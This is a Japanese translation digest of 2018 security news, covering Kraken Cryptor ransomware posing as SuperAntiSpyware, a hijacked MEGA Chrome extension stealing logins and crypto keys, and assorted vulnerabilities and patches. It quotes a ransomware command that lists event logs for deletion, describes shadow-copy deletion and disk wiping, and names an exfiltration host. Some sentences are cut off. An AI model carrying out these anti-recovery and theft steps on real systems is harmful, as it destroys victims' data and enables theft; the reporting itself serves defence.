 このプログラムを実行させないようにするには、スケジュール・タスクを削除しなければならない。更に安全にするために、C:\Program Files\CCleaner\CCupdate.exe 実行ファイルを削除することができる。
Kraken Cryptor身代金要求型マルウェアはSuperAntiSpywareセキュリティプログラムを装っている  BleepingComputer : News>Security (2018/09/14) 
SuperAntiSpywareのように装うKraken Cryptor身代金要求型マルウェア 1.5 
 Kraken Cryptorがリリースされて以来追跡し続けているMalwareHunterTeamは、今朝、新しい変種 を発見した。VirusTotalにエントリして調査しているとき、彼は、Kraken Cryptorインストーラは superantispyware.com から直接配布されているとVirusTotalが通知していることに気づいた。
VirusTotalによって通知されたダウンロードURL
 正当なSuperAntiSpyware Freeインストーラのファイル名は、SUPERAntiSpyware.exeと名付けられている。Kraken Cryptorインストーラは、SUPERAntiSpywares.exeと名付けられていたことでVirusTotalに発見された。二つの名前の唯一の相違点は、悪意ある実行ファイルには"s"が追加されていることである。この悪意ある実行ファイルは最早、uperantispyware.comから利用することは出来ない。
SuperAntiSpywareと同じアイコンを使用しているKraken Cryptor実行ファイル
 重要なことは、SUPERAntiSpyware.exeの実行ファイルは改竄されておらず、SuperAntiSpywareの正当なバージョンのインストールは継続されていることに注意することである。通常のリンクを介してSuperAntiSpywareをインストールしたユーザは影響を受けない。現時点で、我々は、ユーザがどのように悪意あるSUPERAntiSpywares.exe実行ファイルに誘導されるのか分かっていない。BleepingComputerは、eMail、電話、TwitterでSuperAntiSpywareにコメントを求める多くの試みを行ったが、この記事の公開の時点で回答を受け取っていない。
開示: BleepingComputer.comは、SuperAntiSpyware.comや他のアンチ-マルウェア製品と提携している。
Kraken Cryptor身代金要求型マルウェアがコンピュータを暗号化する方法 
 Kraken Cryptor身代金要求型マルウェアは、エクスポートが簡単な組み込み型の設定ファイルによってどのようにコンピュータを暗号化するかの詳細な理解を提供している。この設定ファイルは、モジュールのリストや、モジュールが組み込まれたいた場合には、停止するプロセス、公開暗号鍵、eMail、身代金、暗号化用拡張子、スキップするファイルとフォルダ、暗号化されない国と言語等が含まれている。
Kraken Cryptor 1.5の設定ファイルの一部
 実行されると、この身代金要求型マルウェアは、以下にリストされている一連のステップを実行するが、リストは正確に実行される順番にはなっていないかもしれない。
C:\Windows\system32\cmd.exe /c wevtutil.exe enum-logs > "C:\ProgramData\EventLog.txt"
 このプログラムは、次にこのEventlog.txt中にリストされた全てのログを削除する。
アルメニア、アゼルバイジャン、ベラルーシ、エストニア、ジョージア(以前のグルジア)、イラン、キルギス、リトアニア、ラトビア、モルドバ、ロシア、タジキスタン、ウクライナ、ウズベキスタン、ブラジル
 プロセスがデータベースを開いたままにすることを防ぎ、暗号化を出来ないようにするために、この身代金要求型マルウェアは、以下にリストされているプロセスを終了する。
agntsvcagntsvc, agntsvcencsvc, agntsvcisqlplussvc, dbeng50, dbsnmp, firefoxconfig, msftesql, mydesktopqos,
 コンピュータを暗号化しているとき、以下の拡張子に関してコンピュータをスキャンする。
1cd. 3dm. 3ds. 3fr. 3g2. 3gp. 3pr. 7z. 7zip. aac. ab4. abd. accdb. accde. accdr. accdt. ach. acr. act. adb.
 一致するファイルに遭遇すると、そのファイルを暗号化し、00000000-Lock.onionの形式でそのファイルの名前を変更する。数値はファイルが暗号化される度にインクリメントされる。オリジナルのファイル名は暗号化され、暗号化されたファイル中に格納される。
Kraken Cryptorによって暗号化され、-Lock.onion拡張子が追加されたたファイルのフォルダ
 コンピュータを暗号化しているとき、Kraken Cryptorは全てのフォルダ中に # How to Decrypt Files.html と名付けた脅迫文を作成する。この脅迫文は、一意の犠牲者のキーと、0.125 Bitcoin(【訳註】 約90,636円、9月16日14:54分現在)での身代金の支払いを実行するための方法に関する指示を含んでいる。脅迫文中で提供されているコンタクト情報は、shortmangnet@420blaze と BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage.ch である。
脅迫文の一部
 この身代金要求型マルウェアはまた、SysinternalsサイトからSDeleteをダウンロードし、release.batと呼ばれるバッチファイルを実行する。このバッチファイルは、SDeleteがドライブ上の全ての空き領域をクリアし、ファイルの復元を困難にするために0で上書きすることを発生させる。また、コンピュータをシャットダウンし、Windowsスタートアップ・リカバリを無効にし、Windowsバックアップを削除し、シャドー・ボリューム・コピーを削除する。
Release.batバッチファイル
 これは、全て犠牲者がファイルを復元することを困難にするために実行される。
Kraken Cryptor身代金要求型マルウェアを復号することは不可能 
 残念ながら、現時点でKraken Cryptor身代金要求型マルウェアの変種で暗号化されたファイルを無料で復号する方法はない。シャドー・ボリューム・コピーから暗号化されたファイルを復元する ように人々に提案している。Kraken Cryptor Ransomware Help & Support Topic を使用することができる。
Kraken Cryptor身代金要求型マルウェアから自分自身を守るには 
 Kraken Cryptor(もしくは、あらゆる身代金要求型マルウェア)から自分自身を守るには、適切なコンピュータ習慣とセキュリティ・ソフトウェアを使用することが重要である。何よりも先ず、身代金要求型マルウェア攻撃のような緊急の場合に復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにしなさい。EmsisoftのAnti-Malware やMalwarebytesのAnti-Malware は共に、殆どではないが、コンピュータを暗号化する多くの身代金要求型マルウェア感染を検出することができる挙動検出を含んでいる。
・ ともかくバックアップ 
・ 送信者を知らない場合には、添付ファイルを開いてはならない 
・ 実際に添付ファイルをあなたに送信した人を確認するまでは添付ファイルを開いてはならない 
・ VirusTotalのようなツールで添付ファイルをスキャンしなさい 
・ 必ず、全てのWindowsアップデートが出現すると直ぐにインストールすることを確実にしなさい。また、全てのプログラムのアップデートを確実にしなさい。とりわけ、Java, Flash, Adobe Reader。古いプログラムは、マルウェア配布者によって一般的に悪用されるセキュリティ脆弱性を含んでいる。それ故、プログラムのアップデートを維持することは重要である。 
・ 間違いなくセキュリティソフトがインストールされていることを確実にしなさい 
・ 強力なパスワードを使用しなさい。決して複数のサイトで同じパスワードを使い回してはならない 
・ リモート・デスクトップ・サービスを使用しているのであれば、そのコンピュータを直接インターネットに接続してはならない。代わりに、VPNを介してだけアクセス可能にしなさい 
 
 身代金要求型マルウェア防御の完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomware の記事を訪問しなさい。
UPDATE:  我々はSuperAntiSpywareから以下のステートメントを受け取った。
 SuperAntiSpywareは、BleepingComputerに、「企てられたSUPERAntiSpywareダウンロードサーバに対する攻撃の結果、悪意あるファイルが、SUPERAntiSpywareダウンロードサーバにアップロードされた。企ての数時間後に悪意あるファイルは発見され、サーバから削除された。それ以来、このサーバは完全にスキャンされ、この脆弱性は修正された」と告げてきた。
Veeamが詐欺師共のために200GBの顧客データベースをリークした  Bitdefender : HOTforSecurity (2018/09/13) 記述 し、更に「とりわけMOngoDBsをターゲットにした新しい身代金要求型マルウェア攻撃の波(昨年よりずっと高額になっている)に、このデータベースが襲われなかったことは不幸中の幸いである」と続けている。 述べている 。
人気のあるVPNクライアントに権限昇格のバグが発見された  BleepingComputer : News>Security (2018/09/07) 公開された バグに類似している。
"script-security" 2
 NordVPNとProtonVPNは、Windows上でNotepad(メモ帳)を起動した。
画像をクリックすると拡大します。
 この二つのセキュリティ・バグは、ProtonVPNに関してはCVE-2018-3952で、NordVPNに関してはCVE-2018-4010で現在監視されている。セキュリティ評価は、8.8である(最悪は、10)。ブログ で明らかにしている。手動で このプロセスを開始する必要がある。
MEGA Chrome拡張がログイン認証と仮想通貨を盗む目的でハックされていた  BleepingComputer : News>Security (2018/09/05) SerHack (セキュリティ研究者であり、Moneroプロジェクトの貢献者)によって発見され、直ちにMEGA Chrome拡張のバージョン3.39.4が、ハックされているとする警告がTweet された。他のセキュリティ研究者達は、即座にこの拡張の解析に取り掛かり、彼らが発見したことをレポートしている。
様々なサイトでのログインの監視(画像をクリックすると拡大します)
 URLがRegisterもしくはLoginの文字列を含むか、もしくは、"username", "email", "user", "login", "usr", "pass", "passwd"か"password"と名付けられた変数が存在するあらゆる形式の提出物の監視を実行する。
特定の名前の付いた変数を盗む(画像をクリックすると拡大します)
 この拡張が、これらの形式の提出物やデータ変数を検出すると、https://www.megaopac.host/ と呼ばれるウクライナにあるホストに、この認証と変数の値を送信する。
攻撃者に情報を送信する(画像をクリックすると拡大します)
 この拡張を更に悪いものにしているのは、"https://www.myetherwallet.com/*", "https://mymonero.com/*", "https://idex.market/*"のようなURLのパターンを監視していることである。そして、検出されると、これらのサイトからログインしているユーザの仮想通貨秘密鍵を盗もうとする。
仮想通貨秘密鍵の捕獲(画像をクリックすると拡大します)
 Chrome拡張アーカイブサイト(crx.dam.io)によると、アーカイブされた 最新のバージョンは、3.39.3である。これは、2018年9月2日に存在しており、悪意あるコードは含まれていない。それ故、この拡張は、9月2日以降のある時期に改竄されたことになる。
MEGAをインストールしている場合に実行すべきこと 
 BleepingComputerはSerHackに、どのくらい多くのユーザが、この拡張をインストールしているのかと尋ねた。彼は、影響を受けるユーザは160万を超えるだろうと告げてきた。このハッキングは、明らかに多大な影響力を持っている。MEGA拡張を削除する 必要がある。次に、あらゆるアカウントでのパスワードを変更しなさい、とりわけ、金融、ショッピング、銀行、政府施設、その他あなたが使用しているもの。
MEGAはハックされた拡張に関する声明を発表した 
 MEGAは、その声明に於いて、彼らのChrome拡張Web Storeアカウントがハックされた、そして、発生していることを調査中であると述べている。ブログ で述べ、更に、「インストレーションや自動アップデート時には、昇格されたパーミッション(あなたが訪問している全てのWebサイトでのあなたの全データを読み込み変更できるパーミッション)を要求してくるが、本物のMEGA拡張は、このようなことは要求しない。そして(パーミッションが承認されると)amazon.com, live.com, github.com, google.com (webstoreログイン用), myetherwallet.com, mymonero.com, idex.market, HTTP POSTが他のサイトに要求したものを含む認証情報をウクライナにあるサーバに漏洩する」と続けている。
Microsoftが、Windows 10の累積アップデートKB4346783とKB4343893をリリースした  BleepingComputer : News>Security (2018/08/30) 
Windows 10アップデート チェック
 更新履歴によると、このアップデートはWindows 10の様々な問題を修正するものである。システムにこの最新のパッチをインストールするには、「設定」を開き、更新とセキュリティ -> Windows Updateと進む。「更新プログラムのチェック」をクリックする。いつもどおり、ここから 手動でこのアップデートをダウンロードしインストールすることができる。
Windows 10 April 2018 Update用Build 17134.254 
 現在、Windows 10 April 2018 Updateを使用しているのであれば、KB4346783 が、あなたのデバイス用に表示されているだろう。このパッチは、Windows 10 April 2018 UpdateのPCをBuild 17134.254に高める。このパッチはWindows UpdateもしくはMicrosoft Updateカタログ からダウンロードすることができる。
 【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちら です。このパッチの既知の一つの問題の概要と解決策もこのサイト中に存在しています。
Windows 10 Fall Creators Update用Build 16299.637 
 Windows 10 Fall Creators Updateを依然として使用しているのなら、PCは、KB4343893 を得ているだろう。このアップデートは、顧客をBuild 16299.637に高める。このパッチは以下の修正を含んでいる。
 【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちら です。このパッチの既知の二つの問題の概要と解決策もこのサイト中に存在しています。
 Windows 10 PCのアップデートを維持することは重要なので、このパッチは可能な限り早急にインストールすることが推奨されているが、あなたが、このパッチの適用を遅延したいのであれば、「設定」に進み、「更新とセキュリティ」から、アクティブ時間と再起動オプションを調整しなさい。
Windows Task Scheduler ALPC 0-Dayの一時的なパッチが利用可能になった  BleepingComputer : News>Security (2018/08/30) 
 今週初め、セキュリティ研究者がTask Scheduler ALPCインターフェースに影響を与えるWindowsの0-Day用の脆弱性攻撃コードをリリースした。本日、サイバーセキュリティ企業Acros Securityが、この特定の0-Dayの悪用を防止する一時的な修正(Micropatchと呼ばれる)を公開した。0patch Agentクライアント をダウンロードしインストールすることで一時的パッチを適用することができる。
Micropatchは最新のWindows 10だけでしか利用できない 
 このパッチは、64-bit Windows 10 v1803バージョンのユーザのみしか利用できないと、Mitja Kolsek(Acros SecurityのCEO)はeMail経由で本日BleepingComputerに告げてきた。
0patchのTweet
 この企業はまた、他の影響を受けるプラットフォームに、このパッチを移植するための提案や要求を探している。「我々は、support@0patch.comで他のバージョンへの移植に関する要求を歓迎している」とこの企業は発言している。
この0-Dyaは64-bitだけでなく32-bitプラットフォームにも影響を与える 
 この0-Dayは、セキュリティ研究者がGitHub上に概念の実証コードを公開し、Twitter上でこの問題を喧伝した2日前(8月29日)に表面化した 。この0-Dayは、攻撃者がユーザのデバイス上でゲストもしくはユーザ・レベルからシステム・アクセスで実行するように悪意あるコードのパーミッションを昇格することを可能にするものである。Will Dormann とKevin Beaumont は、僅かな変更で32-bitバージョンでも同様に動作するように修正することができることをレポートした。
Will DormannのTweet
 Microsoftは、いつも通りなんの役にも立たない定型文の回答しか提供しなかったが、Microsoftは、この0-Dayの修正を次回の月例セキュリティアップデート(9月11日、日本時間 9月12日)で修正するであろうと思われていた。初めてのことではない 。
Windows Task Scheduler中の未パッチのフローが公開された  BleepingComputer : News>Security (2018/08/27) Twitter上 で公開した。CERT/CCアラート を発行した。「概念の実証」(PoC)コード をGitHub上にリリースしている。
Windows 10 KB4100347 Intel CPU Updateがブート問題を発生している。また、AMDユーザにも強く求めていた  BleepingComputer : News>Security (2018/08/27) 5月にリリースしたWindows 10とWindows Server 2016用のKB4100347セキュリティ・アップデート のアップデートをリリースした。このアップデートは、Spectre脆弱性を軽減するIntel CPUマイクロコード・アップデートを含んでいる。このバージョンをインストールした後、ユーザは、Windows 10が適切に起動することができなくなった、あるいはパフォーマンスに問題が発生したと報告し続けている。この問題を更に複雑にしているのは、このIntel CPUアップデートが、AMDプロセッサのユーザにも強要されていたことにある。このサポート記事 を更新していないので、8月21日のKB4100347 で何が変更されたのか不明である。我々が認識していることは、このアップデートがWindows Updateを介して提供されて以来、Windows 10マシンが起動しなくなった、無限自動修復ループに陥った、あるいは、Choromeや他のアプリケーションで音楽を再生したときパフォーマンスの問題が発生したという多大なレポートである。Redditへの投稿 によると、ある管理者はXeonプロセッサを使用している殆どのワークステーションに影響を与えるブート問題と理解しているが、他のレポートは、Intel i3 , i5 , i7 プロセッサでも同様に問題を発生していると表明している。
KB4100347アップデートに関するRedditの投稿
 上のRedditへの投稿はまた、ブートができなくなったシステムに関してWindows Recovery Environmentを使用して、このアップデートを削除する方法も提供している。Windowsはブートできるがパフォーマンス問題を持っている人に関しては、このアップデートをアンインストールし、これが助けになるか否か確認することができる。
AMDプロセッサのユーザもIntelマイクロコード・アップデートを提供されている 
 AMDユーザも仲間はずれにされていなかった。Redditへの投稿 によると、KB4100347はIntelプロセッサ用に設計されているが、Windows Updateは、AMDプロセッサを使用しているコンピュータに関しても、このアップデートをインストールしている。
Windows 95がWindows, macOS, Linux用のアプリケーションとして利用可能になった  BleepingComputer : News>Security (2018/08/23) Felix Rieseberg は、この新しいElectronアプリケーションをインストールし実行することで、完全なWindows 95を得ることができるだろうと説明している。このWindows 95 Electronアプリケーションのサイズは、凡そ100MBであり、Windows 10デバイス上で実際に良好に動作している。
Windows 95
 「私は、Windows 95をmacOS, Windows, Linuxで動作するElectronアプリケーションにした。このとんでもないアイデアは驚くほど上手く動作する」と、開発者Felix RiesebergはTweet している。GitHubのページ を訪問しなさい。Windowsコンピュータを持っているのであれば、Windows 95 Setup exe をダウンロードする必要がある。使用するにはこのアプリケーションをダブルクリックしなさい。数分で、あなたのコンピュータは、フル機能のWindows 95オペレーション・システムを実行するだろう。
Adobe: Photoshop CC中の予想外の「緊急」の修正をリリース  Sophos : Naked Security (2018/08/23) 二つの緊急の脆弱性 の急を要する修正をリリースすることになった。CVE-2018-12810  と CVE-2018-12811 として参照される。アップデートは、ヘルプ>アップデート で適用される。
Adobeセキュリティ・ブレティンの説明
 悪用が成功すると現在のユーザのコンテキスト中で任意のコード実行が発生する。
 この修正は、僅か優先度3であるにも拘わらず「緊急」に評価されている。これに関するAdobeの見解が以下である。
 このアップデートは、製品中の今まで攻撃者によって標的とされていなかった脆弱性を解決する。Adobeは管理者の判断でこのアップデートをインストールするように推奨する。
 Photoshop CCの最後の重要な修正は、CVE-2018-4946 の解決として5月にリリースされたが、先週のパッチ群は、Windows用のCreative Cloud Desktop Applicationインストーラ(バージョン4.5.0.324 及び それ以前)中のフローをパッチしたCVE-2018-5003 を含んでいた。先月の修正分 を含む)を作成している、そして、まだ8月である。
過去20年間にリリースされた全てのOpenSSHのバージョンに影響を与える脆弱性  BleepingComputer : News>Security (2018/08/22) 
OpenSSHで発見されたユーザ名列挙型のバグ 
 この特定のバグは、OpenBSDのOpenSSHソースコード中にコミット (【訳註】 データベースの更新処理を正常に完了させて更新内容を確定させることを「コミットする」という(実用日本語表現辞典より))を見つけたQualysのセキュリティ研究者によって先週発見された 。
バグは先週パッチされた。「概念の実証」(PoC)コードはオンライン上にある 
 このバグ(CVE-2018-15473として追跡される)は、OpenSSHの安定版(1:6.7p1-1 と 1:7.7p1-1)と不安定版(1:7.7p1-4)でパッチされた。このパッチは、Debian および、十中八九他のLinuxディストリビューションに行き渡っている。1 , 2 ,3 )で利用可能になっている。
Justin GardnerのTwitterへのリンク 
 NVISO LabsのDidier Stevensは、このバグに対してサーバをテストするためのステップ・バイ・ステップのチュートリアル を公開した。このブログは、脆弱性あるサーバに対するこのバグの悪用の企てを暴く可能性のあるOpenSSHイベントをログする情報を含んでいる。
軽減策も利用可能である 
 諸般の事情からパッチをインストールできないシステム管理者は、様々な軽減策(OpenSSH認証を無効化する、あるいは、リモートデバイスにログインするための代替方法を使用したりするような)を適用することができる。
Ghostscriptインタープリター中に新しく重大な脆弱性。パッチは未だ利用可能になっていない  BleepingComputer : News>Security (2018/08/22) 
バグの悪用はリモート・システムの乗っ取りを引き起こす 
 Ormandyが発見したバグの悪用は、攻撃者が悪性化されたPostScript, PDF, EPS, もしくはXPSファイルを犠牲者に送信することを要求する。このファイルがGhostscriptインタープリターに辿り着くと、内部に含まれている悪意あるコードは、そのマシン上で攻撃者が求めていることを実行する。この脆弱性 (CVE識別子は未だ取得されていない)は、攻撃者がGhostscriptの脆弱性のあるバージョンを使用しているアプリケーションやサーバを乗っ取ることを可能にする。CERT/CCセキュリティ・アドバイザリ によれば、RedHatとUbuntuは、彼らが影響を受けるということを既に確認している。
 Tavis OrmandyのTwitter 8月21日 
Ghostscriptのバグは危険であり大変引く手数多である 
 Ghostscriptは、Web開発やソフトウェア開発コミュニティーで広範に採用されているため、過去数年間Ghostscriptに目を向けてきた。2016年 に、そして、2017年 に再びGhostscriptに影響する類似の大変深刻な問題を発見している。CVE-2017-8291 )は、北朝鮮のハッカー集団 (韓国の仮想通貨交換所に侵入し、資金を盗み、その後、中国語圏の攻撃者グループのハッキングに見せかけるように偽のフラグを植え付けた)によって採用されていた。
研究者によると、仮想通貨交換所はセキュリティを完全に保証していない  Bitdefender : Hot for Security (2018/08/09) Bitcoinの価値を10%下落させた ことを思い出すだろう。発見した 。
危険警告: FCM#135(Full Circle Magazine Issue 135)サイト・リダイレクト  Full Circle Magazine : WebSite (2018/07/28) 
Bitdefenderが、LockCrypt身代金要求型マルウェアの古いバージョンの復号ツールをリリースした  BleepingComputer : News>Security (2018/07/21) 復号ツール をリリースした。2018年2月 から5月末 までアクティブであった。その後、この開発者は、.BI_D 拡張子でファイルをロックする新しいバージョンを開発している。酷い暗号化 を使用していることで知られている。Malwarebytesは、4月のレポート で、この身代金要求型マルウェアの欠陥ある暗号化ルーチンを説明している。Michael Gillespie は、一年以上に渡り、LockCrypt身代金要求型マルウェアの複数のバージョンで暗号化されたファイルを復号するための支援を続けてきている。
  
    LockyCryptのバージョン 状況  
  
    .BI_D 
    復号できない 
     
  
    .1btc 
    Bitdefenderツールで復号可能 
     
  
    .lock 
    復号可能(Michael Gillespieにコンタクトしなさい) 
     
  
    .2018 
    復号可能(Michael Gillespieにコンタクトしなさい) 
   
  
    .mich 
    復号可能(Michael Gillespieにコンタクトしなさい) 
     
 
 LockyCrypt身代金要求型マルウェアは、ハッカーがRDP接続を介して企業のネットワークに侵入するためにブルートフォース攻撃を使用した後に犠牲者に感染し、次に、手動でこの身代金要求型マルウェアのバイナリを実行する身代金要求型マルウェア(ランサムウェア)株である。2017年6月に最初に発見された 。セキュリティ研究者は、Satan Ransomware-as-a-Service(【訳註】 知識を持つサイバー犯罪者が、ランサムウェアを利用した自作のサービスを「Ransomware as a Service(RaaS)」として、新人や志望者向け材料キットの形で提供すること(トレンドマイクロ・セキュリティブログより))ポータル上で以前活動していたグループ中にその製作者を追跡した 。
Microsoft EdgeのXSSフィルターは壊れているようである  BleepingComputer : News>Security (2018/07/21) 2008年 にXSS Filterを開発し稼働した。この機能は、Internet Explorer 8に最初に搭載されたが、Edgeで拡張され、Google ChromeやSafariのような他のブラウザにも配備された。
XSS Filterの動作方法 
 このセキュリティ機能は、"X-XSS-Protection"として知られている。この名前で知られている理由は、Webサイトのオーナが、彼らのサイトを提供するサーバに"X-XSS-Protection"と名付けられたHTTPヘッダーを構築することができるからである。
X-XSS-Protection: 0
 ブラウザが、"X-XSS-Protection: 0"を確認すると、ブラウザは、XSS Filterプロテクションを無効にする。
EdgeのXSS FilterはDefaultで起動していない 
 今週、Heyesは、Edgeが、XSS Filter設定に関して思われているように挙動していないことを発見した。
XSS Filterを削除するケース 
 しかし、PortSwiggerの研究者は、Microsoftが本当にその方向に進むのであれば、XSS Filterを削除することは良いアイデアかもしれないとして、多くのセキュリティ研究者がこの件で泣き喚かなくて良くなるだろうとして、彼らはXSS Filterを削除した場合を構築した。1 , 2 , 3 ]ために、これを乱用した。決して表明しておらず 、この機能がクロスブラウザ対応のアンチ-XSSメカニズムになる可能性を妨げた。公式のドキュメンテーション・サイト )によると、このXSS機能は、以前のように重要なものではない 。つまり、
 これらの防御は、サイトが、インラインJavaScriptの使用を無効にする強力なContent-Security-Policy(CSP、コンテンツセキュリティポリシー、【訳註】 クロスサイトスクリプティング (XSS) やデータインジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤー(MDN web docsより))を実装している時には、モダン・ブラウザにとっては不必要なことが多いが、これらの防御は、未だにCSPをサポートしていない古いWebブラウザのユーザにとっては、依然として防御を提供することができるものである。
 第四に、この機能はしばしば、Webサイトのオーナーによって誤って理解され誤った設定がなされている 。それ故、この機能はめったにその真価を発揮していない。
Magniber身代金要求型マルウェアは、他のアジア諸国をターゲットにするために韓国から拡散している  BleepingComputer : News>Security (2018/07/16) Magniber身代金要求型マルウェア が、ターゲットの範囲を拡大し、今や、PCの言語設定が中国語圏(マカオ、中国、シンガポール)やマレー語圏(マレーシア、ブルネイ)になっているユーザにも感染する能力を持っている。
MalwareHunterTeamのTwitter 
 Magniber身代金要求型マルウェアは今迄、韓国に居住するユーザと、その地域に特有のPC言語設定を持つユーザに関してのみファイルの暗号化を行ってきた。しかし、しばしば韓国ユーザは、海外旅行中や、韓国IPでプロキシを使用している間に感染させられている。
韓国外への拡散が確認された 
 しかし今回は、真実のようである。Malwarebytesの研究チームは、最近拡散と、この身代金要求型マルウェアのバイナリ中に重要な変更を発見した。技術的分析 中で記述している。
Magnitude EKもまた、変更された 
 これらの変更に関する理由は不明であるが、それらはまた、Magnitudeエクスプロイトキット(過去9ヶ月間、Magniber感染の唯一の供給源)にも影響を与えている。Magniberの"magni"は密接な関係を持つMagniberが由来である。
新しいMagniberキャンペーンは、以前のIEの0-Dayを使用している 
 Malwarebytesによると、この新しく改悪されたMagniberバージョンを配備していることが確認されている最近のMagnitudeエクスプロイトキット・キャンペーンは、4月 に発見され、5月 にパッチされ、6月 まで他のエクスプロイトキットによって採用されていたInternet Explorerの0-Dayを悪用している。今迄のストーリー 中で説明してきたように、エクスプロイトキットは、モダンブラウザに対しては、むしろ失敗する。これは、Microsoftのブラウザ以外のブラウザをアップデートして利用しているユーザは、これらの攻撃からは安全なはずである。
明らかになった新たなSpectre 1.1、Spectre 1.2 CPUフロー  BleepingComputer : News>Security (2018/07/11) 
Spectre 1.1、Spectre 1.2の簡単な説明 
 研究者によると、Specter 1.1の攻撃は、投機的実行を使用し、CPUストアのキャッシュバッファをオーバーフローさせるコードを提供し、以前に確保されたCPUメモリセクションからデータを取得する悪意のあるコードの書き込みを実行する。
これらのバグは、Intel、ARM、そして、まず間違いなくAMDにも影響を与える 
 Intel とARM は、彼らのCPUの一部が、Spectre 1.1に脆弱性のあることを公に認めている。AMDは、声明を発表していないが、伝統的にセキュリティ問題の検証が緩慢である。全Spectre攻撃は、AMDのCPUに影響を与えているので、今回の新しい攻撃も、同様にAMDの製品群に影響を与えると仮定したほうが安全である。Intelのガイド は、脆弱性を緩和するために、アプリケーション・レベルで、開発者がどのようにソース・コードを検査し修正することができるかについての情報を含んでいる。Microsoft , Oracle , Red Hat は、彼らの製品によって取り扱われるデータがSpectre 1.1の影響を受けるか否か依然として調査中であると、ソフトウェア・レベルで、このリスクを緩和するための方法を検討中であると発言している。Speculative Buffer Overflows: Attacks and Defenses )において、これらのフローを発見した二人の学者は、Spectre 1.1攻撃とSpectre 1.2の一つを防御するためにハードウェア・ベースの緩和策を提案した。
 Intelは、今研究チームに対して、Intelが最近稼働させたバグバウンティ・プログラム(脆弱性報奨金制度、オリジナルのMeltdownとSpectre脆弱性の発覚後にIntelが設立 した)に基づき、このバグの発見に関し$100,000(約1100万円)の報奨金 を支払った。これは、現在までに知られている最高額の報奨金の一つである。
  
    変種 説明 CVE コードネーム 影響を受けるCPU 詳細な情報  
  
    Variant 1 
    境界チェックバイパス 
    CVE-2017-5753 
    Spectre v1 
    Intel, AMD, ARM 
    Webサイト    
  
    Variant 1.1 
    ストア上の境界チェックバイパス 
    CVE-2018-3693 
    Spectre 1.1 
    Intel, ARM 
    論文    
  
    Variant 1.2 
    読み取り専用の保護対策バイパス 
    定められていない 
    Spectre 1.2 
    Intel, ARM 
    論文    
  
    Variant 2 
    分岐先の書き換え 
    CVE-2017-5715 
    Spectre v2 
    Intel, ARM, AMD 
    Webサイト  
  
    Variant 3 
    不正なキャッシュアクセス 
    CVE-2017-5754 
    Meltdown 
    Intel 
    Webサイト    
  
    Variant 3a 
    不正なシステム・レジスタの読み出し 
    CVE-2018-3640 
     ー  
    Intel, ARM, AMD, IBM 
    Mitre  
  
    Variant 4 
    投機的ストア・バイパス 
    CVE-2018-3639 
    SpectreNG 
    Intel, ARM, AMD, IBM 
    Microsoftブログ投稿    
 
ダウンロード爆弾(Download bomb)トリックは、Chromeに回帰しているが、Firefox, Opera, Vivaldi, Braveにも影響を与える。  BleepingComputer : News>Security (2018/07/03) 
回帰した「ダウンロード爆弾」トリック 
 「ダウンロード爆弾」トリックは、特定のページでブラウザをフリーズさせるために数百もしくは数千のダウンロードを開始するテクニックである。気が付いた 。このテクニック は、技術サポートサイト上でChromeブラウザをフリーズさせるために、数千のダウンロードを次から次へと開始するために、JavaScript Blobメソッドとwindow.navigator.msSaveOrOpenBlob関数を使用していた。
フリーズしているChromeのユーザインタフェース(画像をクリックすると拡大します)
 Googleの開発陣は、このキャンペーンに気が付き、Chrome 65.0.3325.70でこの問題を修正した。オリジナル・バグレポート での応答によると、この問題は6月12日にリリースされた Google Chrome 67.0.3396.87で復活した。発言 している。「(私は)、私のブラウザをフリーズさせるスカム・サイトへの悪意あるリダイレクトによって、この問題を偶々見つけた」と彼は続けている。
ダウンロード爆弾テクニックはまた、他のブラウザにも影響を与える 
 しかし、この問題は当初考えられていたより広がりを見せてきている。2月に、この問題を最初に解析したMalwarebytesのセキュリティエキスパートJerome Segura は、Firefoxも影響を受ける ことを指摘していた。Chrome とFirefox 用の概念の実証(proof-of-concept、PoC)を使用した。我々のテストによると、BraveとVivaldiも、この概念の実証(proof-of-concept、PoC)を稼働した時フリーズした。
Dr Symantecは、ルータ上のVPNFilterの脅威に関する手っ取り早くて簡単なチェックを提供している  The Register : Security (2018/07/02) VPNFilterマルウェア に対応するためのクリーンアップの努力はフリーの診断ツールのリリースで加速された。5月 にCisco Talosのセキュリティ研究者によって発見されたVPNFilterは、ルータ、NASデバイスのような50万ものIoTデバイスをハイジャックしていると見積もられている。こちら のSymantecのサイトを閲覧しなさい。VPNFilter Check は、家庭もしくは企業のネットワークが、感染させられているルータによって変更されたか否かを突き止めるツールである。説明している 。
クリップボード・ハイジャッカー・マルウェアは、230万Bitcoinアドレスを監視している  BleepingComputer : News>Security (2018/06/30) 仮想通貨クリップボード・ハイジャッカー について記述しており、それは新しいものではないが、今までのサンプルの殆どは、40万から60万の仮想通貨アドレスを監視していた。今週、BleepingComputerは、230万もの仮想通貨アドレスを監視しているこの種のマルウェア に気が付いた。
マルウェアによって監視されている230万の仮想通貨アドレス
 このマルウェアが、Windowsクリップボード中に発見した仮想通貨アドレスを置き換える方法を示すために、我々は、こちらにビデオ を作成した。
感染の仕組み 
 この感染は、今週拡散していたAll-Radio 4.27 Portableマルウェア・パッケージ の構成部分として見つけられた。インストールされるとき、d3dx11_31.dllという名前のDLLが、WindowsのTempフォルダにダウンロードされ、ユーザがコンピュータにログインした時、"DirectX 11"と呼ばれるAutorunが、このDLLを稼働するために作成される。
この感染を起動しているRundll32.exe
クリップボード・ハイジャッカーから自身を保護するには 
 このようなマルウェアは、バックグラウンドで実行され、稼働している兆候を示さないので、感染していることを見つけるのは簡単ではない。それ故、この種の脅威から自身を保護するためには、インストールされているアンチウィルス ソフトを常にアップデートしておくことが重要である。
Windows Defenderは、正当なファイルをTrojan:Win32/Bluteal.B!rfnとして検出している  BleepingComputer : News>Security (2018/06/27) 投稿 した。
Trojan:Win32/Bluteal.B!rfnの誤検出
